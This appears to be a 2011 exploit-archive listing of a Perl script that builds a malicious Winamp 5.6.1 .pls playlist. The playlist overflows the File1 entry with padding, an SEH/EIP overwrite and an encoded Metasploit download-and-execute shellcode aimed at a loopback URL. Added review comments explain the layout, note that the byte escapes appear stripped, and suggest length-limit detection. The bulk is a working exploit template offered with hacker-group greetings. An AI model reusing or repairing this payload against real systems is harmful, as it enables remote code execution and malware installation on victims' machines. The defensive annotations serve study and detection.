Home / exploits Winamp 5.6.1 .pls Remote Command Execution
Posted on 14 April 2011
#!/usr/bin/perl
###
# Title : Winamp 5.6.1 (.pls) Remote Command Execution
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com || ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : windows
# Impact : Remote Command Execution / Download and Exec / Crashs...
# Tested on : Windows XP sp3 FR
###
# Note : BAC 2011 Enchallah ( Ked & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
##
# [»] ~ special thanks to : jos_ali_joe (exploit-id.com) , and All exploit-id Team
###
#
# Review summary: this script concatenates a playlist header, an "http://"
# prefix, a padding run, two short strings ($seh, $eip), a filler run, an
# encoded payload string and a trailing filler run, then appends the result
# to KedAns.pls in the current directory. The result is a one-entry playlist
# whose File1 value is a single, very long URL-like string.
#
# NOTE(review): every string below reads "x41", "x90", "xeb..." with no
# backslash, so as rendered on this page Perl treats them as plain text and
# the file written is printable ASCII, not the byte values the author's
# comments describe. Presumably the escapes were lost when the page was
# extracted; the listing is documented here as shown.
#
# For defenders, the relevant artifact is a .pls file whose File1 value is far
# longer than any real URL: the padding alone is 1321 + 32 + 543 repetitions.
# A length limit on playlist entries, enforced in the parser or in a mail/web
# content filter, covers this kind of file without needing a payload
# signature. The author's header names Winamp 5.6.1 on Windows XP SP3 as the
# tested target; the page does not name a fixed version.
# =============
my $junk = "http://";           # URL scheme prefix that starts the File1 value
my $buffer = "x41" x 1321;      # padding: the string repeated 1321 times
my $seh = "xebx06x90x90" ;      # short jump (author's label; name suggests an exception-handler record)
my $eip = "xadx86x0ex07";       # CALL ESP nde.dll (author's label: an address inside a bundled DLL)
my $nop = "x90" x 32;           # filler run placed before the payload
# =============
# windows/download_exec (http://www.metasploit.com)
# Encoder: x86/alpha_mixed
# URL= http://127.0.0.1:8888/ked/k.exe
#
# The three lines above are the author's annotation of the payload. The URL
# is a loopback address, i.e. a lab placeholder rather than a live host.
# NOTE(review): going by the module name only (not verified from the bytes),
# a payload of this type fetches and runs an executable, so an outbound HTTP
# request followed by a new child process from the media player is the
# behaviour worth alerting on.
my $shellcode =
"x56x54x58x36x33x30x56x58x48x34x39x48x48x48" .
"x50x68x59x41x41x51x68x5ax59x59x59x59x41x41" .
"x51x51x44x44x44x64x33x36x46x46x46x46x54x58" .
"x56x6ax30x50x50x54x55x50x50x61x33x30x31x30" .
"x38x39x49x49x49x49x49x49x49x49x49x49x49x49" .
"x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41" .
"x30x41x6bx41x41x51x32x41x42x32x42x42x30x42" .
"x42x41x42x58x50x38x41x42x75x4ax49x4ax4bx46" .
"x70x42x7ax42x6ax45x63x48x49x50x66x4ex59x45" .
"x6cx47x71x4dx50x45x64x45x5ax4cx59x4bx52x49" .
"x6ax48x6bx47x75x4dx38x4ax4bx4bx4fx4bx4fx49" .
"x6fx44x30x50x4cx4fx69x4ax39x4fx69x4bx73x49" .
"x6dx45x68x4dx79x4ex79x4fx69x4dx49x42x32x4b" .
"x69x4ex75x45x42x48x69x4fx75x46x54x47x62x4a" .
"x79x4cx51x44x52x51x51x44x52x4bx5ax49x35x45" .
"x42x4ax4dx4dx57x4bx51x4fx6ax42x4ax42x32x4b" .
"x57x4ex59x4dx4ax51x72x42x32x48x57x4cx4dx4d" .
"x7ax50x74x48x4fx48x4ex4ax68x42x32x4fx56x4e" .
"x7ax50x62x45x42x42x4bx4bx43x4ex77x49x50x43" .
"x5ax45x6fx48x6dx4ex71x4fx30x4ax66x44x5ax51" .
"x4ex4fx6dx49x4cx51x6bx44x30x4bx70x4ax66x4f" .
"x37x42x32x42x74x45x42x49x4fx4fx4dx4ex7ax50" .
"x5ax47x38x42x58x4cx5ax42x78x4fx5ax50x50x4b" .
"x4fx46x72x4ex71x47x62x49x4fx4ex65x4dx4ax42" .
"x7ax50x58x42x58x4fx6bx4dx4ax46x38x47x62x4a" .
"x39x4cx5ax42x7ax45x42x45x33x46x72x42x4ex46" .
"x7ax43x6fx4ax37x47x62x42x69x4bx43x4fx6dx4f" .
"x30x51x61x4fx39x4cx59x4cx59x4ax39x44x5ax51" .
"x4fx4cx54x48x4bx4ax6fx50x66x48x4ex51x75x48" .
"x43x46x72x43x71x48x73x4ax38x4fx30x50x71x4f" .
"x54x4ex79x4cx59x4ax39x45x4ax43x6fx4dx5ax4a" .
"x6fx4bx6fx42x39x4fx57x45x49x48x6cx45x33x46" .
"x79x4ex4fx45x49x48x47x47x6ax42x55x48x39x44" .
"x52x42x65x48x73x4cx79x48x4ax51x76x4ax6ex43" .
"x45x51x4ex4dx4dx4dx4ax49x55x49x68x4dx67x49" .
"x6cx43x6ex4bx6dx4fx6ax4fx6dx4bx51x49x6cx4d" .
"x49x4fx69x4cx6ax46x39x4fx39x48x49x4ax6ax4a" .
"x6fx4fx39x45x36x4ax6ex43x55x42x32x51x55x49" .
"x59x4bx7ax51x76x48x4ex51x79x4ax69x50x66x4a" .
"x6ex42x4dx4dx7ax51x49x50x35x47x6cx50x59x4a" .
"x4cx45x30x4ax68x48x4bx4ax6fx4bx7ax43x56x42" .
"x6bx48x43x4bx70x46x52x43x4bx43x47x4ex4ax51" .
"x49x50x5ax42x51x4dx6fx45x36x50x66x51x76x49" .
"x4ex4bx4cx4ax4dx48x49x4ax4bx4ax56x4ax5ax48" .
"x58x4bx4dx4bx4dx48x6bx4bx4cx48x6ax4ax4ax4c" .
"x59x49x4ex49x6cx4ax4dx49x5ax4bx50x49x7ax48" .
"x6dx49x6cx49x64x4bx6dx4cx30x48x6bx49x6cx4a" .
"x5ax48x6dx4ax56x4ax4bx49x70x4ax78x4ax39x4a" .
"x6ex4ax50x4bx47x4bx6cx49x71x49x6cx4ax5ax4f" .
"x69x4bx6cx48x61x4ax50x4ax4dx48x4dx4cx31x48" .
"x6bx4bx4cx48x78x4bx4dx4dx49x49x45x4bx46x48" .
"x78x49x6dx4bx65x48x70x4bx4bx4ax4bx4ax58x4a" .
"x4bx4dx30x4bx68x4cx59x48x6cx48x6bx48x75x4b" .
"x44x4ax56x48x77x4fx69x4ax6cx4ax6bx49x45x49" .
"x4dx4cx36x4ax4ex48x77x48x75x4ax56x4bx48x49" .
"x6dx48x4dx49x66x4bx6fx4cx30x48x75x49x6cx4e" .
"x38x4ax39x42x48x51x64x51x64x42x50x47x4ax44" .
"x6fx44x6fx50x31x44x72x50x37x44x6ex50x30x46" .
"x4ex50x30x44x6ex46x51x44x7ax44x78x50x38x46" .
"x58x46x58x44x6fx50x6bx45x35x51x74x46x4fx42" .
"x4bx44x6ex43x55x51x68x50x65x4bx30x41x41";
# =============
# Playlist preamble: section name, entry count, and the key whose value is the
# long string built above. As rendered, the three pieces are separated by
# spaces rather than line breaks (presumably lost newline escapes), so the
# output begins with the single line "[playlist] NumberOfEntries=1 File1=".
my $header="[playlist] ".
"NumberOfEntries=1 ".
"File1=";
my $finalnop = "x90" x 543;     # trailing filler run appended after the payload
# =============
# Write the assembled playlist to disk.
# NOTE(review): this is a two-argument open with a bareword handle in '>>'
# (append) mode, and the results of open, print and close are not checked.
# A second run appends another copy to the same KedAns.pls, and a failed open
# passes silently.
open(myfile,'>> KedAns.pls');
print myfile $header.$junk.$buffer.$seh.$eip.$nop.$shellcode.$finalnop;
close (myfile);
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * jos_ali_joe (exploit-id.com) * r0073rt (Inj3ct0r.com) * TreX (hotturks.org)
# Nayla Festa * all (sec4ever.com) Members * KelvinX (kelvinx.net) * PLATEN (Pentesters.ir)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.1337day.com * exploit-db.com * exploit-id.com * www.packetstormsecurity.org * bugsearch.net
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================
